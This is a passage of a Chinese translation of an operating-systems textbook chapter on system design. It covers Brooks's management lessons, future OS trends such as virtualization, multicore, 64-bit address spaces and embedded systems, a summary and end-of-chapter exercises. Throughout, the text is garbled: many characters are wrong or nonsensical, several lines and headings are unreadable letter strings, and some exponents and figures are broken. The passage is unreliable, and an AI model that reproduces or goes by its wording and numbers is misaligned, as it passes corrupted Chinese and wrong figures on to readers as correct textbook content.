进行 协调 。 经 验 表 明 ， 你 所 管理 的 每 一 个 人 将 花费 你 10% 的 时 间 ， 所 以 
每 10 个 团队 的 一 个 小 组 就 需要 一 名 全 职 的 经 理 人 。 这 些 经 理 人 也 必须 
被 管理 。 
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院 的 Jerry Saltzer 将 这 一 效应 称 为 坏 消息 二 极 管 (bad-news diode) 。 因 
为 存在 着 在 两 于 年 前 将 冲 来 坏 信息 的 信使 折 首 的 古老 传统 ， 所 以 首席 
程序 员 或 经 理 人 都 不 愿意 告诉 他 的 老板 项 目 延期 了 4 个 月 ， 并 且 无 论 如 
何 都 没有 满足 最 终 时 限 的 机 会 。 因 此 ， 顶 层 管 理 痢 殉 项 目的 状态 通 单 
不 明 束 里 。 当 不 能 满足 最 终 时 限 的 情况 变 得 十 分 明显 时 ， 顶 层 管理 考 
的 响应 是 增加 人 人 员 ， 此 时 Brooks 定 律 就 起 作用 了 。 


实际 上 ， 大 型 公司 拥有 生产 软件 的 丰富 经 验 并 且 知 道 如 果 它 随意 
地 生产 会 发 生 什 么 ， 这 样 的 公司 趋 癌 于 至 少 是 试 独 正确 地 做 事情 。 相 
反 ， 较 小 的 、 较 新 的 公司 ， 匆 匆忙 忙 地 希望 其 产品 早日 上 市 ， 不 能 总 
是 仔细 地 生产 他 们 的 软件 。 这 经 常 导致 远 远 不 是 最 优化 的 结 


Brooks 和 Mills 都 没有 预见 到 开放 源码 运动 的 成 长 。 尽 管 该 运动 取 
得 了 某 些 成 功 ， 但 是 一 旦 新 鲜 感 消失 ， 它 是 否 还 是 生产 大 量 高 质量 软 
件 的 切实 可 行 的 模型 还 有 待 观察 。 回 想 早年 无 线 电 广播 是 由 业余 无 线 
电 操 作 人 员 占 据 支 配 地 位 的 ， 但 是 很 快 就 让 位 于 商业 无 线 电 台 和 后 来 
的 商业 电视 台 。 值 得 注意 的 是 ， 最 为 成 功 的 开放 源码 软件 项 目 显然 使 
用 了 首席 程序 员 模 型 ， 有 一 名 才智 超群 者 控制 着 体系 结构 设计 ( 例 
如 ，Linus Torvalds? Æ Linux 4%, Richard Stallman 控 制 厦 GNU C 


编译 器 ) 。 


[1] =f (Reims) 法 国 东北 部 城市 。 一 一 译 者 注 


13.5.3 ”经 验 的 作用 


拥有 让 是 经验 的 设计 人 员 对 于 一 个 操作 系统 项 目 来 说 至 天 重要 。 
Brooks 指 出 ， 大 多 数 错误 不 是 在 代码 中 ， 而 是 在 设计 中 。 程 序 员 正 确 
地 做 了 吟 只 他 们 要 做 的 事情 ， 而 吟 只 他 们 要 做 的 事情 十 错误 的 。 表 多 
测试 软件 都 无 法 弥补 糟 粽 的 设计 说 明 书 。 


Brooks 的 解决 方案 是 放弃 图 13-11a 的 经 典 开 发 模型 而 采用 图 13-11b 
的 模型 。 此 处 的 想法 是 首先 编写 一 个 主 程序 ， 它 仅仅 调用 顶层 过 程 ， 
而 顶层 过 程 最 初 是 哑 过 程 。 从 项 目的 第 一 天 开始 ， 系 统 就 可 以 编译 和 
运行 ， 尽 管 它 什么 都 做 不 了 。 随 着 时 间 的 流逝 ， 模 块 被 播 入 到 完全 的 
系统 中 。 这 一 方法 的 成 效 是 系统 集成 测试 能 够 持续 地 执行 ， 这 样 设计 
中 的 错误 就 可 以 更 早 地 显露 出 来 。 实 际 上 ， 拙 劣 的 设计 决策 导致 的 学 
习 过 程 在 软件 生命 周期 中 应 该 更 早 就 开始 。 


ae 


图 13-11) a) 传 统 的 分 阶段 软件 设计 过 程 ，b) 男 一 种 设计 在 第 一 天 开 
始 就 产生 一 个 〈 什 么 都 不 做 的 ) 工作 系统 


缺乏 知识 是 一 件 危 险 的 事情 。Brooks 注 意 到 被 他 称 为 第 二 系统 效 
M (second system effect) 的 现象 。 一 个 设计 团队 生产 的 第 一 件 产品 经 
常 是 最 小 化 的 ， 因 为 设计 人 员 担 心 它 可 能 根本 就 不 能 工作 。 结 果 ， 他 
们 在 加 入 许多 功能 特性 方面 是 迟疑 的 。 如 果 项 目 取得 成 功 ， 他 们 会 构 
建 后 续 的 系统 。 由 于 被 他 们 目 己 的 成 功 所 感动 ， 设 计 人 员 在 第 二 次 会 
包含 所 有 华而不实 的 东西 ， 而 这 些 是 他 们 在 第 一 次 有 意 省 去 的 。 结 
果 ， 第 二 个 系统 胱 肿 不 堪 并 且 性 能 低劣 。 第 二 个 系统 的 失败 使 他 们 在 
第 三 次 冷静 下 来 并 且 再 次 小 心意 慎 。 

就 这 一 点 而 言 ，CTSS 和 MULTICS 这 一 对 系统 是 一 个 明显 的 例子 。 


CTSS 和 是 第 一 个 通用 分 时 系统 并 且 取 得 了 巨大 的 成 功 ， 尽 管 它 只 有 了 最 小 
化 的 功能 。 它 的 后 继 者 MULTICS 过 于 野心 动 盈 并 因此 而 吃 尽 了 否 涉 。 


MULTICSAYAIA eR AFA, (Ee HEA BT A Gt LA EAR 
系统 的 性 能 十 分 低 务 并 且 绝 对 不 是 一 个 重大 的 商业 成 功 。 在 这 一 开发 
路 线 中 的 第 三 个 系统 UNIX 则 更 加 小 心 谍 慎 并 且 更 加 成 功 。 


13.5.4 ”没有 银 弹 


除了 《人 月 神话 》，Brooks 还 写 了 一 篇 有 影响 的 学 术 论文 ， 称 
为 “No Silver Bullet” (没有 银 弹 ) (Brooks,1987) 。 在 这 篇 文章 中 ， 
他 主张 在 十 年 之 内 由 各 色 人 等 兜售 的 灵丹妙药 中 ， 没 有 一 样 能 够 在 软 
件 生 产 率 上 产生 数量 级 的 改进 。 经 验 表 明 他 是 正确 的 。 


在 建议 的 银 弹 中 ， 包 括 更 好 的 高 级 语言 、 面 向 对 象 的 程序 设计 、 
人 工 智 能 、 专 家 系统 、 上 自动 程序 设计 、 图 形 化 程序 设计 、 程 序 验证 以 
及 程序 设计 环境 。 或 许 在 下 一 个 十 年 将 会 看 到 一 颗 银 弹 ， 或 许 我 们 将 
只 好 满足 于 逐步 的 、 渐 进 的 改进 。 


13.6 ”操作 系统 设计 的 趋势 


做 预测 总 是 困难 的 一 一 特别 是 关于 未 来 。 例 如 ，1899 年 美国 专利 
局 局 长 Charles H.Duell 请 求 当 时 的 总 统 McKinley (AEF) 取消 专利 
局 (以 及 他 的 工作 ! ) ， 因 为 他 声称 “每 件 能 发 明 的 事物 都 已 经 发 明 
T” (Cerf and Navasky,1984) 。 然 而 ，Thomas Edison (托马斯 - 爱 迪 
Æ) 在 几 年 之 内 就 发 明了 几 件 新 的 物品 ， 包 括 电灯 、 留 声 机 和 电影 放 
映 机 。 让 我 们 将 新 电池 装 入 我 们 的 水 晶 球 中 ， 并 且 冒 险 猜测 一 下 在 最 
近 的 未 来 操作 系统 将 走向 何方 。 


13.6.1 ”虚拟 化 


虚拟 化 重 回 时 代 。 它 第 一 次 出 现在 1967 年 的 IBM CP/CMS 系 统 
中 ， 现 在 它 重 回 奔腾 平台 。 最 近 许多 计算 机 在 裸 机 上 运行 管理 程序 ， 
如 图 13-12 所 示 。 管理 程序 会 创建 多 个 虚拟 机 ， 每 个 虚拟 机 有 单独 的 操 
作 系 统 。 有 些 计算 机 利用 一 个 虚拟 机 为 遗产 应 用 创建 Windows 系 统 ， 
利用 几 个 虚拟 机 为 当前 应 用 运行 Linux 系 统 ， 或 许 也 会 在 其 他 虚拟 机 上 
运行 看 干 实验 性 操作 系统 。 这 种 现象 在 第 8 章 已 经 讨论 ， 并 且 是 未 来 的 
发 展 趋势 。 


虚拟 机 Other 


Windows| Linux Linux OS 


便 件 


13-12 ”运行 4 个 虚拟 机 的 管理 程序 


13.6.2 多核 芯片 


多 核心 片 已 经 出 现 ， 但 即使 是 双核 ， 针 对 它们 的 操作 系统 还 没有 
很 好 地 利用 其 能 力 ， 更 不 用 提 64 核 。 这 些 核 会 做 什么 事情 ? 它们 需要 
哪些 软件 ?这些 目前 部 十 未 知 的 。 起 初 ， 人 们 试图 通过 对 当前 操作 系 
统 打 补 丁 的 方法 来 文 持 多 核 ， 但 锁 表 问题 和 其 他 软件 资源 的 问题 使 得 
这 种 方法 不 太 可 能 成 功 ， 因 此 需要 全 痢 的 思路 来 解决 这 些 问 题 。 


虚拟 化 和 多 核 芯片 的 结合 创造 了 一 个 全 新 的 环境 ， 这 里 CPU 的 数 
目 是 可 编程 的 。 对 于 8 核 必 片 ， 软 件 可 以 在 下 列 情况 做 同样 的 事情 : 只 
利用 1 个 CPU 而 名 略 其 他 7 个 ; 使 用 全 部 8 个 CPU; 利用 双 道 虚拟 化 获得 
16 个 虚拟 CPU; 利用 四 道 虚 拟 化 获得 32 个 虚拟 CPU; 或 更 多 其 他 组 
合 。 程 序 可 以 在 启动 时 指定 所 需 CPU 数 目 ， 由 操作 系统 来 保证 程序 需 
求 的 满足 。 


13.6.3 ”大 型 地 址 空间 操作 系统 


随 痢 计算 机 从 32 位 地 址 空间 转 回 64 位 地 址 空间 ， 操 作 系 统 设计 中 
的 重大 转变 成 为 可 能 。32 位 地 址 空间 并 不 大 。 如 果 你 通过 给 地 球 上 的 
每 个 人 提供 他 或 她 目 己 的 字 市 来 试图 分 割 2* 个 字 太 ， 那 么 将 没有 足够 
的 字 节 可 以 提供 。 相 反 ，2% 大 约 是 2x10。 现 在 每 个 人 可 以 得 到 他 
或 她 个 人 的 3GB 大 的 一 块 。 


对 于 2x103 字 市 的 地 址 空间 我 们 能 做 什么 呢 ? 甫 先 ， 可 以 淘汰 文 
件 系 统 概念 。 作 为 蔡 代 ， 所 有 文件 在 概念 上 可 以 始终 保存 在 (虚拟 ) 
内 存 中 。 毕 竟 在 那里 存在 足够 的 空间 ， 可 以 放下 超过 10 亿 部 全 长 的 电 
影 ， 每 一 部 压缩 到 4GB。 


另 一 个 可 能 的 用 和 途 是 永久 对 象 存储 。 对 象 可 以 在 地 址 空间 中 创 
建 ， 并 且 保存 在 那里 直到 所 有 对 它们 的 引用 消失 ， 在 此 时 它们 可 以 目 
动 被 删除 。 这 样 的 对 象 在 地 址 空间 中 是 永久 的 ， 甚 至 古 在 关机 和 重新 
启动 计算 机 的 时 候 。 有 了 64 位 的 地 址 空间 ， 在 用 光 地 址 空间 之 前 ， 可 
以 用 每 秒 100MB 的 速率 创建 对 象 长 达 5000 年 。 当 然 ， 为 了 实际 存储 这 
么 大 量 的 数据 ， 需 要 许多 磁盘 存储 需 用 于 分 页 交换 ， 但 是 在 历史 上 这 
征 第 一 次 限制 因素 是 磁 副 ， 而 不 是 地 址 空间 。 


由 于 大 量 数目 的 对 象 在 地 址 空间 中 ， 人 允许 多 个 进程 同时 在 相同 的 
地 址 空间 中 运行 ， 以 便 以 一 般 的 方式 共 至 对 象 整 变 得 十 分 有 趣 了 。 这 
样 的 设计 显然 会 通 向 与 我 们 现在 所 使 用 的 操作 系统 完全 不 同 的 操作 系 
统 。 有 关 这 一 概念 的 某 些 思想 包含 在 参考 文献 (Chase 等 人 ，1994) 
中 o 


束 64 位 地 址 而 言 ， 另 一 个 必须 重新 思考 的 操作 系统 问题 是 虚拟 内 
存 。 对 于 2 字 闻 的 虚拟 地 址 空间 和 8KB 的 页 面 ， 我 们 有 22 个 页 面 。 
常规 的 页 表 不 能 很 好 地 按 比 例 变 换 到 这 样 的 大 小 ， 所 以 需要 别 的 东 
西 。 反 转 的 页 表 是 可 行 的 ， 但 是 也 有 人 提出 了 其 他 的 想法 (Talluri 等 
人 ，1995) 。 无 论 如 何 ，64 位 操作 系统 为 新 的 研究 提供 了 大 量 的 余 
地 。 


13.6.4 联网 


当前 的 操作 系统 是 为 独立 的 计算 机 而 设计 的 。 联 网 是 事后 添加 
的 ， 并 且 一 般 通 过 特殊 的 程序 访问 ， 例 如 Web 浏 览 融 、FTP 或 telnet 。 
在 将 来 ， 联 网 或 许 将 会 是 所 有 操作 系统 的 基础 。 不 有 具备 网 络 连接 的 独 
立 的 计算 机 殊 像 是 没有 连接 到 电话 网 的 电话 机 一 样 罕见 。 并 且 很 可 能 
儿 Gbps 的 连接 是 标准 的 速率 。 


操作 系统 将 不 得 不 改变 以 适应 这 一 范 型 的 转变 。 本 地 数据 与 远程 
数据 的 区 别 可 能 会 模糊 到 这 样 的 程度 : 实际 上 没有 人 知道 或 者 关心 数 
据 存放 在 什么 地 方 。 任 何 地 方 的 计算 机 能 够 像 本 地 数据 一 样 处 理 任何 
地 方 的 数据 。 在 一 个 有 限 的 范围 内 ， 对 于 NFS 而 言 这 已 经 成 为 现实 ， 
但 是 它 很 可 能 变 得 更 加 普遍 并 且 更 好 地 集成 。 


对 于 Web 的 访问 现在 需要 特殊 的 程序 (浏览 器 ) ， 将 来 可 能 会 以 
一 种 无 颖 的 方式 完全 集成 到 操作 系统 中 。 存 储 信 息 的 标准 方式 可 能 会 
变 为 Web 页 面 ， 并 且 这 些 页 面 可 能 包含 各 种 各 样 的 非 文 本 项 目 ， 包 括 
首 频 、 视 频 、 程 序 以 及 其 他 ， 它 们 全 部 作为 操作 系统 的 基本 数据 而 管 
理 。 


13.6.5 ”并 行 系统 与 分 布 式 系统 


另 一 个 活跃 的 领域 是 并 行 系统 与 分 布 式 系统 。 当 前 的 多 处 理 郁 操 
作 系 统 和 多 计算 机 操作 系统 只 是 标准 的 单 处 理 器 操作 系统 对 调度 希 进 
行 了 轻微 的 调整 ， 以 便 对 并 行 性 处 理 得 好 一 点 。 在 将 来 ， 我 们 可 能 会 
看 到 这 样 的 操作 系统 ， 其 中 并 行 性 比 现在 更 加 处 于 中 心地 位 。 如 果 在 
多 处 理 器 配置 下 台式 计算 机 很 快 拥有 2 个 、4 个 或 更 多 的 CPU， 这 一 效 
应 将 会 大 大 地 激发 。 这 就 可 能 导致 许多 应 用 程序 为 多 处 理 絮 而 设计 ， 
并 且 束 要 求 操作 系统 对 并 发 性 要 求 提供 更 好 的 文 持 。 

在 未 来 几 年 ， 多 计算 机 很 可 能 在 大 规模 科学 与 工程 超级 计算 机 中 


占据 支配 地 位 ， 但 是 它们 的 操作 系统 还 相当 原始 。 进 程 安置 、 负 载 平 
衡 以 及 通信 都 需要 做 大 量 的 工作 。 


目前 分 布 式 系统 经 钊 作为 中 间 件 来 构建 ， 因 为 现 有 的 操作 系统 没 
有 为 分 布 式 应 用 程序 提供 正确 的 设施 。 今 后 ， 操 作 系 统 的 设计 将 会 
虑 到 分 布 式 系统 ， 所 以 从 一 开始 所 有 必要 的 功能 特性 在 操作 系统 中 丈 
CAE T ° 


13.6.6 ”多 媒体 


多 媒体 系统 在 计算 机 世界 里 显然 是 一 颗 正 在 升 起 的 明星 。 如 采 计 
算 机 、 立 体 声 音 啊 、 电 视 机 和 电话 机 全 部 合并 在 一 起 成 为 一 个 单一 的 
设备 ， 能 够 文 持 高 质量 的 静止 图 像 、 音 频 和 视频 ， 并 且 连 接 到 高 速 网 
络 中 ， 从 而 能 够 轻松 地 下 载 、 交 换 和 远程 访问 这 些 文件 ， 可 能 不 会 
人 感到 吃惊 。 这 些 设备 的 操作 系统 ， 甚 至 古 独 立 的 首 频 和 视频 设备 的 
操作 系统 ， 与 现在 的 操作 系统 在 本 质 上 是 不 同 的 。 等 别 地 ， 实 时 保证 
是 必须 的 ， 这 将 推动 系统 设计 。 此 外 ， 消 费 者 完全 不 能 容忍 他 们 的 数 
字 电 视 时 不 时 地 裔 演 ， 所 以 要 求 更 好 的 软件 质量 和 容错 性 。 还 有 ， 多 
媒体 文件 倾向 于 非常 长 ， 所 以 必须 改造 文件 系统 以 便 能 够 有 效 地 处 理 


El 


13.6.7 电池 供电 的 计算 机 


功能 强大 的 台式 计算 机 (可 能 拥有 64 位 地 址 空间 、 高 带宽 网 络 、 
多 处 理 器 以 及 高 品质 的 首 频 和 视频 ) 无 疑 很 快 束 会 普及 。 它 们 的 操作 
系统 必然 与 目前 的 操作 系统 有 重大 的 区 别 ， 以 便 处 理 所 有 这 些 需 求 。 
然而 ， 市 场 上 增长 甚至 更 快 的 部 分 是 电池 供电 的 计算 机 ， 包 括 笔 记 
本 、 掌 上 机 、Webpad、100 美 元 的 膝 上 机 以 及 状 能 手机 。 它 们 中 的 茶 
些 机 种 拥有 与 外 部 世界 的 无 线 连 接 ， 其 他 的 机 种 当 它 们 不 在 家 中 与 雹 
站 对 接 时 将 运行 在 非 连 接 的 模式 下 。 这 就 需要 不 同 的 操作 系统 ， 它 们 
比 当前 的 操作 系统 更 加 小 巧 、 快 束 、 灵 活 和 可 靠 。 在 这 里 ， 各 种 各 样 
的 微 内 核 与 可 扩展 的 系统 可 能 形成 这 类 操作 系统 的 基础 。 


这 些 操作 系统 必须 处 理 完全 连接 〈 也 就 是 有 线 连接 ) 、 弱 连接 
(也 就 是 无 线 连 接 ) 和 非 连 接 操作 ， 包 括 离 线 前 的 数据 储藏 和 返回 在 
线 时 的 一 致 性 分 析 ， 这 些 都 要 比 当前 的 系统 更 好 。 它 们 还 必须 能 比 当 
前 的 系统 更 好 地 处 理 移动 问题 (例如 找到 一 个 激光 打印 机 ， 登 录 到 其 
上 上， 并且 通过 无 线 电波 把 文件 发 送 给 它 ) 。 电 源 管理 是 必需 的 ， 这 包 
括 在 操作 系统 与 应 用 程序 之 间 关 于 剩余 多 少 电池 电量 以 及 电池 如 何 基 
好 利用 的 大 量 对 话 框 。 动 仿 地 改 关 应 用 程序 以 处 理 微 小 屏幕 的 局 限 可 
变 得 十 分 重要 。 最 后 ， 新 的 输入 和 输出 模式 (包括 手写 和 语音 ) 可 
需要 操作 系统 的 新 技术 以 改善 品质 。 电 池 供 电 、 掌 上 无 线 、 语 首 操 
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作 的 计算 机 ， 与 具有 4 个 64 位 CPU 的 多 处 理 器 以 及 以 GB 为 单位 光纤 网 
络 连 接 的 台式 计算 机 ， 两 者 的 操作 系统 不 太 可 能 有 很 多 共同 之 处 。 当 
然 ， 还 存在 无 数 的 混交 机 种 具有 它们 目 己 的 需求 。 


13.6.8 RARA 


新 型 操作 系统 将 高 速 增长 的 最 后 一 个 领域 是 能 入 式 系统 。 处 于 洗 
衣 机 、 和 微波炉、 玩具、 晶体 管 收音 机 、MP3 播 放 釉 、 便 携 式 摄像 机 、 
电 标 以 及 心脏 起 捕 器 内 部 的 操作 系统 将 不 同 于 上 面 的 所 有 操作 系统 ， 
并 且 很 可 能 相互 之 间 也 不 相同 。 每 个 操作 系统 或 许 都 需要 仔细 地 甬 裁 
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知道 它 只 运行 有 限 数目 的 程序 ， 所 以 对 其 进行 优化 是 可 能 的 ， 而 这 样 
的 优化 在 通用 系统 中 十 做 不 到 的 。 


N 


对 于 崩 入 式 系 统 而 言 ， 一 种 有 布 望 的 思路 古 可 扩展 的 操作 系统 
(例如 Paramecium 和 Exokernel) 。 这 些 操作 系统 可 以 随 着 应 用 程序 的 
需要 而 被 构建 成 轻 量 级 的 或 重量 级 的 ， 但 是 以 一 种 应 用 程序 间 一 致 的 
方式 。 因 为 能 入 式 系统 将 以 上 亿 的 量 级 生产 ， 所 以 对 于 新 型 操作 系统 
而 言 这 是 一 个 主要 的 市 场 。 


13.6.9 ERTA 


虽然 传 感 网 络 的 市 场 并 不 大 ， 但 它们 正 被 部 署 在 很 多 环境 中 ， 从 
楼 宇 / 边 境 监控 到 森林 火险 监测 等 。 传 感 右 是 低 成 本 、 低 功 耗 的 ， 需 要 
特别 精简 的 操作 系统 ， 仪 比 运行 时 函数 库 复 洒 一 些 。 随 着 功能 强大 的 
传 感 斑点 越 来 越 便 宇 ， 我 们 会 看 到 实际 的 操作 系统 运行 其 上 ， 并 尽 可 
能 针对 其 任务 进行 优化 、 尽 可 能 节约 功 耗 。 一 般 来 说 ， 其 电池 寿命 以 
月 衡量 ， 而 无 线 传输 和 是 主要 的 电源 消耗 者 ， 因 此 这 些 系 统 应 该 以 万 能 
为 首要 目标 。 


13.7 AY 


操作 系统 的 设计 开始 于 确定 它 应 该 做 什么 。 接 口 应 该 是 简单 的 、 
完备 的 和 高 效 的 。 应 该 拥有 一 个 清晰 的 用 户 界 面 范 型 、 执 行 范 型 和 数 


据 范 型 。 


系统 应 该 具有 民 好 的 结构 ， 使 用 春 干 种 已 知 技术 中 的 一 种 ， 例 如 
分 层 结构 或 客户 -服务 硕 结 构 。 内 部 组 件 应 该 是 相互 正 交 的 ， 并 且 要 清 
楚 地 分 离 策 略 与 机 制 。 大 量 的 精力 应 该 投入 到 诸如 静态 与 动态 数据 结 
构 、 命 名 、 绑 定时 机 以 及 模块 实现 次 序 这 样 的 一 些 问 题 上 。 


性 能 是 重要 的 ， 但 是 优化 应 该 仔细 地 选择 ， 从 而 使 优化 不 致 于 破 
坏 系 统 的 结构 。 空 间 -时 间 权 衡 、 高 速 组 存 、 线 索 、 利 用 局 部 性 以 及 优 
化 和 常见 的 情况 等 技术 通常 都 值得 答 试 。 


两 三 个 人 编写 一 个 系统 与 300 个 人 生产 一 个 大 型 系统 是 不 同 的 。 在 
后 一 种 情况 下 ， 团 队 结构 和 项 目 管 理 对 于 项 目的 成 败 起 着 至 天 重要 的 
作用 。 


最 后 ， 操 作 系 统 在 未 来 几 年 必须 进行 变 章 以 跟 上 新 的 趋势 和 迎接 
新 的 挑战 。 这 些 趋势 和 挑战 包括 基于 管理 程序 的 系统 、 多 核 系统 、64 
位 地 址 空间 、 大 规模 的 网 络 连 接 、 大 规模 多 处 理 右 、 多 媒体 、 掌 上 无 


线 计算 机 、 和 髓 入 式 系统 及 其 传 感 节点 。 对 于 操作 系统 设计 人 员 来 说 今 
后 几 年 将 十 分 令 人 激动 。 


习题 


1. 摩 尔 定律 (Moore's law) 描述 了 一 种 指数 增长 现象 ， 类 似 于 将 
一 个 动物 物种 引入 到 具有 充足 食物 并 且 没 有 天 敌 的 新 环境 中 生长 。 本 
质 上 ， 随 着 食物 供应 变 得 有 限 或 者 食肉 动物 学 会 了 捕食 新 的 被 捕食 
者 ,一 条 指数 增长 曲线 可 能 最 终 成 为 一 条 具有 一 个 渐进 极限 的 S 形 曲 
线 。 讨 论 可 能 最 终 限 制 计算 机 硬件 改进 速率 的 因素 。 


2. 图 13-1 显 示 了 两 种 范 型 :算法 范 型 和 事件 驱动 范 型 。 对 于 下 壕 
每 一 种 程序 ， 哪 一 范 型 可 能 更 容易 使 用 : 


a) Fait ae 
b) 照 片 编辑 程序 
c 工 资 单程 序 


3. 在 某 些 早期 的 苹果 Macintosh 计 算 机 上 ，GUI 代 码 是 在 ROM 中 
的 。 为 什么 ? 


4.Corbat6 的 格言 是 系统 应 该 提供 最 小 机 制 。 这 里 十 一 份 POSIX 调 
用 的 列表 ， 这 些 调用 也 存在 于 UNIX 版 本 7 中 。 哪 些 是 元 余 的 ? 换 句 话 
说 ， 哪 些 可 以 被 删除 而 不 损失 功能 性 ， 因 为 其 他 调用 的 简单 组 合 可 以 
做 同样 的 工作 并 具有 大 体 相同 的 性 能 。access 、alarm ` chdir ` 


chmod ` chown ` chroot ` close ` creat ` dup ` exec ` exit ` fentl ` fork ` 
fstat ~ ioctl `œ kill `œ link ` lseek ~ mkdir ` mknod ` open ` pause ` pipe ` 


read ` stat `œ time ` times ~ umask ` unlink ` utime ` wait 和 write ° 


5. 在 一 个 基于 微 内 核 的 客户 -服务 器 系统 中 ， 微 内 核 只 做 消 居 传递 
而 不 做 其 他 任何 事情 。 用 户 进 程 仍然 可 以 创建 和 使 用 信号 量 吗 ? 如 采 
征 ， 怎 样 做 ? 如 果 不 定 ， 为 什么 不 能 ? 


6. 细 致 的 优化 可 以 改进 系统 调用 的 性 能 。 考 虑 这 样 一 种 情况 ， 一 
个 系统 调用 每 10ms 调 用 一 次 ， 一 次 调用 花费 的 平均 时 间 是 2ms。 如果 
系统 调用 能 够 加 速 两 倍 ， 人 花费 10s 的 一 个 进程 现在 要 化 费 多 少时 间 运 


一 


IT? 
7. 请 在 零售 两 店 的 上 下 文中 简要 讨论 一 下 机 制 与 策略 。 


8. 操 作 系 统 经 常 在 外 部 和 内 部 这 两 个 不 同 的 层次 上 实现 命名 。 这 
些 名 字 束 如 下 性 质 有 什么 区 别 ? 


a KE 
b) 惟 一 性 


0) 层次 结构 


9. 处 理 大 小 事先 未 知 的 表格 的 一 种 方法 是 将 其 大 小 固定 ， 但 是 当 
表格 填 满 时 ， 用 一 个 更 大 的 表格 取代 它 ， 并 且 将 旧 的 表 项 复制 到 新 表 
中 ， 然 后 释放 旧 的 表格 。 使 新 表 的 大 小 是 原始 表格 大 小 的 2 倍 ， 与 新 表 
的 大 小 只 是 原始 表格 大 小 的 1.5 倍 相 比 ， 有 什么 优点 和 缺点 ? 


10. 在 图 13-5 中 ， 标 志 found 用 于 表明 是 否 找 到 一 个 PID。 和 忽略 found 
而 只 是 在 循环 的 结尾 处 测试 p 以 了 解 是 否 到 达 结 尾 ， 这 样 做 可 行 吗 ? 


11. 在 图 13-6 中 ， 条 件 编 译 隐 藏 了 Pentium 与 Ultra SPARC 的 区 别 。 
相同 的 方法 可 以 用 于 隐藏 拥有 一 块 IDE 磁 盘 作为 惟一 磁盘 的 Pentium 与 
拥有 一 块 SCSI 磁 盘 作为 惟一 磁盘 的 Pentium 之 间 的 区 别 吗 ? 这 是 一 个 好 
的 思路 吗 ? 


12. 间 接 是 使 一 个 算法 更 加 灵活 的 一 种 方法 。 它 有 缺点 吗 ? RA 
的 话 ， 有 哪些 缺点 ? 


13. 可 重 入 的 过 程 能 够 拥有 私有 静态 全 局 变量 吗 ? 讨论 你 的 答案 。 


14. 图 13-7b 中 的 宏 显 然 比 图 13-7a 中 的 过 程 效 率 更 高 。 然 而 ， 它 的 
一 个 缺点 是 难于 阅读 。 它 还 存在 其 他 缺点 吗 ? 如 果 有 的 话 ， 还 有 哪些 
BRA? 


15. 假 设 我 们 需要 一 种 方法 来 计算 一 个 32 位 字 中 1 的 个 数 是 奇数 还 
是 偶数 。 请 设计 一 种 算法 尽 可 能 快 地 执行 这 一 计算 。 如 果 必 要 ， 你 可 


以 使 用 最 大 256KB 的 RAM 来 存放 各 种 表 。 编 写 一 个 宏 实 现 你 的 算法 。 
附加 分 :编写 一 个 过 程 通过 在 32 个 位 上 进行 循环 来 做 计算 。 测 量 一 下 
你 的 安 比 过 程 快 多 少 倍 。 


16. 在 图 13-8 中 ， 我 们 看 到 GIF 文件 如 何 使 用 8 位 的 值 作 为 索引 检索 
一 个 调 色 板 。 相 同 的 思路 可 以 用 于 16 位 宽 的 调 色 板 。 在 什么 情况 下 
(如 果 有 的 话 ) ，24 位 的 调 色 板 是 一 个 好 的 思路 ? 


17.GIF 的 一 个 缺点 是 图 像 必须 包含 调 色 板 ， 这 会 增加 文件 的 大 
小 。 对 于 一 个 8 位 寓 的 调 色 板 而 言 ， 达 到 收文 平衡 的 最 小 图 像 大 小 是 多 
D? 对 于 16 位 视 的 调 色 板 重复 这 一 问题 。 


18. 在 正文 中 ， 我 们 展示 了 对 路 径 名 进行 高 速 缓存 使 得 当 碍 找 路 径 
名 时 可 以 显著 地 加 速 。 有 了 时 使 用 的 另 一 种 技术 是 让 一 个 守护 程序 打开 
根 目录 中 的 所 有 文件 ， 并 且 保 持 它们 永久 地 打开 ， 为 的 是 过 使 它们 的 i 
节点 始终 处 于 内 存 中 。 像 这 样 钉 住 节 点 可 以 进一步 改进 路 径 查 找 吗 ? 


19. 即 使 一 个 远程 文件 目 从 记录 了 一 个 线索 以 来 没有 被 删除 ， 它 也 
可 能 自从 最 后 一 次 引用 以 来 发 生 了 改变 。 有 哪些 可 能 有 用 的 其 他 信息 
BOR? 


20. 考 虑 一 个 系统 ， 它 将 对 远程 文件 的 引用 作为 线索 而 储藏 ， 例 如 
形 如 (名字 ， 远 程 主机 ， 远 程 名 字 ) 。 一 个 远程 文件 悄悄 地 被 删除 然 


后 被 取代 有 是 可 能 的 。 那 么 线索 将 取 回 错误 的 文件 。 怎 样 才 能 使 这 一 问 
题 尽 可 能 少 地 发 生 ? 


21. 我 们 在 正文 中 阐述 了 局 部 性 经 常 可 以 被 用 来 改进 性 能 。 但 是 ， 
考虑 一 种 情况 ， 其 中 一 个 程序 从 一 个 数据 源 读 取 输 入 并 且 连 续 地 输出 
到 两 个 或 多 个 文件 中 。 试 图 利用 文件 系统 中 的 局 部 性 在 这 里 可 能 会 导 
致 效率 的 降低 吗 ? 存在 解决 这 一 问题 的 方法 吗 ? 


22.Fred Brooks 声 称 一 名 程序 员 每 年 只 能 编写 1000 行 调试 好 的 代 
码 ， 然 而 MINIX 的 第 一 版 (13 000 行 代码 ) 是 一 个 人 在 3 年 之 内 创作 
的 。 怎 样 解释 这 一 矛盾 ? 


23. 使 用 Brooks 每 名 程序 员 每 年 1000 行 的 数字 ， 估 计生 产 Windows 
Vista 人 花费 的 资金 数量 。 假 设 一 名 程序 员 每 年 的 成 本 是 100 000 美 元 ( 包 
括 日 常 开销 ， 例 如 计算 机 、 办 公 空间 、 秘 书 支持 以 及 管理 开销 ) 。 你 
相信 这 一 答案 吗 ? 如 采 不 相信 ， 什 么 地 方 有 错误 ? 


24. 随 痢 内 存 越 来 越 便 宜 ， 可 以 设想 一 台 计 算 机 拥有 巨大 容量 的 电 
池 供 电 的 RAM 来 取代 人 硬盘 。 以 当前 的 价格 ， 仅 有 RAM 的 低 疾 PC 成 本 
征 多 少 ? 假设 1GB 的 RAM 副 对 于 低 妆 机 器 十 足够 的 。 这 样 的 机 器 有 苋 
FANG? 


25. NABER EA RB ERAT SEP A is e H BUY A LER E BS 
的 某 些 功能 特性 。 


26. 使 用 C 编 写 一 个 过 程 ， 在 两 个 给 定 的 参数 上 做 双 精 度 加 法 。 使 
用 条 件 编 译 编写 该 过 程 ， 使 它 既 可 以 在 16 位 机 器 上 工作 ， 也 可 以 在 32 
位 机 器 上 工作 。 


27. 编 写 程序 ， 将 随机 生成 的 短 字 符 串 输入 到 一 个 数组 中 ， 然 后 使 
